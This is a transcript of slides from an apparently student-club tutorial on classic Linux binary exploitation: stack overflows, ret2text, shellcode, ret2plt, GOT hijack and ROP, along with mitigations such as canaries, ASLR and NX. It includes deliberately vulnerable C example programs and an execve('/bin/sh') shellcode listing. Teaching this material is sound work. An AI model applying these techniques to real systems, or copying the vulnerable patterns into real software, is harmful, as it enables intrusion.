別pwn那裡.pdf

Transcript

1. 別PWN那裡 DoubleSigma Terrynini

2. ancient pwn basic

3. Before learning the ancient pwn, Make sure that you understand

   the concept of stack frame. If your answer is negative, there is an ancient material for you from 2018/12/14. All the example code are at the end of this material.

4. ancient pwn buffer overflow

5. ancient pwn $ gcc -fno-stack-protector pwn_01.c -o pwn_01
 $ ./pwn_01


   aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 [1] 19730 segmentation fault (core dumped) ./pwn_01 These are some ancient tricks, so we have to turn off some modern feature.

6. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

   address high address name[0]~name[7] name[8]~name[15] name[16]~name[23]

7. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

   address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] aaaaaaaa aaaaaaaa

8. ancient pwn Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

   address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] aaaaaaaa aaaaaaaa STACK Overflow ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

9. ancient pwn gets() is deprecated, because it’s dangerous.

10. ancient pwn $ gcc -fno-stack-protector pwn_02.c -o pwn_02

11. ancient pwn 0 Previous RBP Return Address \00\00\00\00\00\00\00\00 low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value

12. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value

13. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value 0x6161616161616161

14. ancient pwn 0 Previous RBP Return Address aaaaaaaa low address

    high address visitor.name[0]~visitor.name[7] visitor.Taiwan_value Buffer Overflow! 0x6161616161616161 /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

15. ancient pwn ret2text

16. ancient pwn $ gcc -fno-stack-protector -no-pie pwn_03.c -o pwn_03 Let’s

    pwn with pwntool this time.

17. ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address

    name[0]~name[7] name[8]~name[15] Previous RBP

18. ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address

    name[0]~name[7] name[8]~name[15] Previous RBP aaaaaaaa 0x0400577 0000000000400577 <cheat>: 400577: push rbp 400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret .--------------------------------------. | | | | | | | | | | | | | | | | '--------------------------------------'

19. .--------------------------------------. | | | | | | | | |

    | | | | | | | '--------------------------------------' ancient pwn Return Address aaaaaaaa aaaaaaaa low address high address name[0]~name[7] name[8]~name[15] Previous RBP aaaaaaaa 0x0400577 Control Flow Hijack ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 0000000000400577 <cheat>: 400577: push rbp 400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret

20. ancient pwn Controlling the return address, and jump to a

    piece of code. It was named ret2text.

21. ancient pwn ret2sc

22. Shellcode $ gcc -fno-stack-protector -z execstack pwn_04.c -o pwn_04

23. Return Address shellcode shellcode note[0x90]~note[0x97] Previous RBP Shellcode push 0x68

    mov rax, 0x732f2f2f6e69622f push rax mov rdi, rsp push 0x1010101 ^ 0x6873 xor dword ptr [rsp], 0x1010101 xor esi, esi push rsi push 8 pop rsi add rsi, rsp push rsi mov rsi, rsp xor edx, edx push SYS_execve pop rax syscall note[0x97]~note[0x9e] .------------------------------------. | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | '------------------------------------' | | | asm() '---------------------------->

24. Return Address shellcode shellcode 0x7ffcbe83d7c0 high address note[0x90]~note[0x97] Previous RBP

    Shellcode note[0x97]~note[0x9e]

25. Return Address shellcode shellcode 0x7ffcbe83d7c0 high address Previous RBP Shellcode

    Garbage 0x7ffcbe83d7c0 note[0x90]~note[0x97] note[0x97]~note[0x9e]

26. Return Address shellcode shellcode 0x7ffcbe83d7c0 high address Previous RBP Shellcode

    Garbage 0x7ffcbe83d7c0 note[0x90]~note[0x97] note[0x97]~note[0x9e] retturn to shellcode! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

27. ancient pwn Practice time

28. ancient pwn How ancient humans deal with these kind of

    attack?

29. Stack Guard Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low

    address high address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary

30. Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low address high

    address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary aaaaaaaa aaaaaaaa aaaaaaaa Stack Guard

31. Previous RBP Return Address aaaaaaaa aaaaaaaa aaaaaaaa low address high

    address name[0]~name[7] name[8]~name[15] name[16]~name[23] canary aaaaaaaa aaaaaaaa aaaaaaaa stack smashing detected /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Stack Guard

32. ASLR Address Space Layout Randomization It’s a feature of kernel,

    Linux kernel enable it by default. To randomize the .text, a binary have to be compiled with PIE.

33. ASLR Address Space Layout Randomization $ gcc -fno-stack-protector pwn_03.c -o

    pwn_03

34. ASLR Address Space Layout Randomization 0000000000400577 <cheat>: 400577: push rbp

    400578: mov rbp,rsp 40057b: lea rdi,[rip+0xd6] 400582: call 400460 <puts@plt> 400587: nop 400588: pop rbp 400589: ret 00000000000006ca <cheat>: 6ca: push rbp 6cb: mov rbp,rsp 6ce: lea rdi,[rip+0xd3] 6d5: call 580 <puts@plt> 6da: nop 6db: pop rbp 6dc: ret .---------------------------------------. .----------------------------------. | | | | | | | | | | | | | | PIE | | | |>>>>>>>>>>>>>>>>>>>>>>| | | | | | | | | |
 | | | | | | | |
 | | | | '---------------------------------------' '----------------------------------'

35. DEP Data execution prevention Need hardware support which called CPU

    NX bit. NX bit, no execute bit, marks certain areas of memory as non-executable.

36. $ gcc -fno-stack-protector pwn_04.c -o pwn_04 DEP Data execution prevention

    The shellcode on stack and heap would become unexecutable.

37. ancient pwn ret2plt

38. PLT&GOT Procedure Linkage Table & Global offset Table A dynamic

    link binary has to relocate library function calls during execution. $ gcc -c pwn_05.c -o pwn_05.o

39. PLT&GOT Procedure Linkage Table & Global offset Table A dynamic

    link binary has to relocate library function calls during execution. $ gcc -c pwn_04.c -o pwn_04.o

40. PLT&GOT Procedure Linkage Table & Global offset Table External functions

    are unknown during the link stage, and we shouldn’t modify the instruction after compilation. 0000000000000000 <main>: ... 30: e8 00 00 00 00 call 35 <main+0x35> 35: 48 8d 85 f0 fe ff ff lea rax,[rbp-0x110]

41. PLT&GOT Procedure Linkage Table & Global offset Table To solve

    that, we have GOT, global offset table. ld is response to resolve xxxx@GLIBC during loading. <main>: call printf@GOT GOT 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------.
 | scanf@GLIBC | '---------------' .---------------.
 | printf@GLIBC | '---------------' .---------------.
 | read@GLIBC | '---------------' .---------------.
 | exit@GLIBC | '---------------' .------------> ---' .-------> | ---'

42. PLT&GOT Procedure Linkage Table & Global offset Table When a

    binary is too big, it takes lots of time to fill out GOT. Sometimes, some functions won’t be called during execution, we don’t need to resolve them each time.

43. PLT&GOT Procedure Linkage Table & Global offset Table To solve

    that, we have PLT, procedure linkage table, and a mechanism named Lazy binding. <main>: call printf@plt GOT .---------------.
 | printf@GLIBC | '---------------' .-------> ---' .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------' .----------> | | first call | -----------' ------------. second call | | | | '----> .----. | ld | '----' | | | | resolve | | | v

44. ret2plt Return Address aaaaaaaa aaaaaaaa low address high address Previous

    RBP .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------'

45. ret2plt Return Address aaaaaaaa aaaaaaaa low address high address Previous

    RBP Garbage printf@plt .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------'

46. Return Address aaaaaaaa aaaaaaaa low address high address Previous RBP

    Garbage printf@plt .-----------------------------------. |<printf@plt>: | | jmp QWORD PTR [rip+0x200aba] | | push 0x0 | | jmp 500 <.plt> | '-----------------------------------' Return to plt ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ret2plt

47. ancient pwn GOT hijack

48. $ gcc -zlazy pwn_04.c -o pwn_04 GOT Hijack If the

    Lazy Binding is applied, GOT must be writable.

49. .---------------.
 | call puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC

    | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack

50. .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' .---------------.
 | call

    puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack

51. .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' |

    | | v Over Write .---------------.
 | call puts | '---------------' GOT+0x20 .------------.
 | puts@GLIBC | '------------' ---> -------> 0x12345678 <_IO_puts@@GLIBC_2.2.5>: push r13 push r12 mov r12,rdi push rbp push rbx .---------------------------. | | | | | | | | | | | | | | '---------------------------' .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> GOT Hijack

52. .------------.
 | call puts | '------------' GOT+0x20 .-------------------------------.
 | __libc_system@@GLIBC_PRIVATE

    | '-------------------------------' ---> .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' | | | v Over Write ---> .-------------------.
 | system(“/bin/sh”) | '-------------------' GOT Hijack

53. GOT Hijack .------------.
 | call puts | '------------' GOT+0x20 .-------------------------------.


    | __libc_system@@GLIBC_PRIVATE | '-------------------------------' ---> .-----------------.
 | puts(“/bin/sh”) | '-----------------' ---> .---------------------------------------------.
 | GOT+0x20 = __libc_system@@GLIBC_PRIVATE | '---------------------------------------------' | .--------------------------' | | | v Over Write ---> .-------------------.
 | system(“/bin/sh”) | '-------------------' GOT Hijack ! /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

54. But you have to leak libc base address first. GOT

    Hijack

55. ancient pwn Practice time

56. ancient pwn ROP

57. ROP Return Oriented Programming What if we can’t reach our

    goal by jumping on a piece of code?

58. .------------. | | | | | | | | '------------'

    ROP Return Oriented Programming xor rax, rax ret inc rax ret mov rcx, rax ret .------------. | | | | | | | | '------------' .--------------. | | | | | | | | '--------------' 0x8010AB0 0x8010CD0 0x8010EF0 + +

59. .----------------------------------------------------------------------------. | | | | | | | | |

    | | | | | | | ‘----------------------------------------------------------------------------' .------------. | | | | | | | | '------------' ROP Return Oriented Programming xor rax, rax ret inc rax ret mov rcx, rax ret .------------. | | | | | | | | '------------' .--------------. | | | | | | | | '--------------' 0x8010AB0 0x8010CD0 0x8010EF0 + + .------------. | | | | | | | | '------------' xor rax, rax inc rax mov rcx, rax .------------. | | | | | | | | '------------' rcx = 1 = =

60. .------------. | | | | | | | | '------------'

    .--------------. | | | | | | | | '--------------' Return Address aaaaaaaa aaaaaaaa low address high address Previous RBP .------------. | | | | | | | | '------------' xor rax, rax ret inc rax ret mov rcx, rax ret 0x8010AB0 0x8010CD0 0x8010EF0 0x8010CD0 0x8010AB0 0x8010EF0 ROP aaaaaaaa

61. ancient pwn ret2libc

62. ancient pwn Practice time

63. ancient pwn codes

64. Example pwn_01.c #include <stdio.h> int main(){ char name[24]; gets(name); printf("

    Your namename is %s.", name); return 0; }

65. Example pwn_02.c #include <stdio.h> #include <unistd.h> typedef struct{ char name[8];

    long int Taiwan_value; }passport; int main(){ passport visitor; visitor.Taiwan_value = 0; read(0, visitor.name, 18); if( visitor.Taiwan_value > 0){ printf(" %s !? welcome, Taiwanese.", visitor.name); printf("Value : %d",visitor.Taiwan_value); }else{ printf(" %s ?? Get off, outlander.",visitor.name); } return 0; }

66. Example pwn_03.c #include <stdio.h> #include <unistd.h> void cheat(){ puts("My grandpa

    taught me this in Hawaii "); } int main(){ char name[0x10]; read(0, name, 0x20); printf("%s", name); return 0; }

67. Example pwn_04.c #include <stdio.h> #include <unistd.h> int main(){ char note[0x100];

    printf("the address is : %p \n",note); read(0, note, 0x120); return 0; }

68. Example pwn_05.c #include <stdio.h> #include <unistd.h> int main(){ char note[0x100];

    puts("So... where is the system ?"); system("echo 'here'"); printf("printf is at %p\nsystem is at %p\noffset = %d\n", printf, system, (int) (system)-(int)(printf)); return 0; }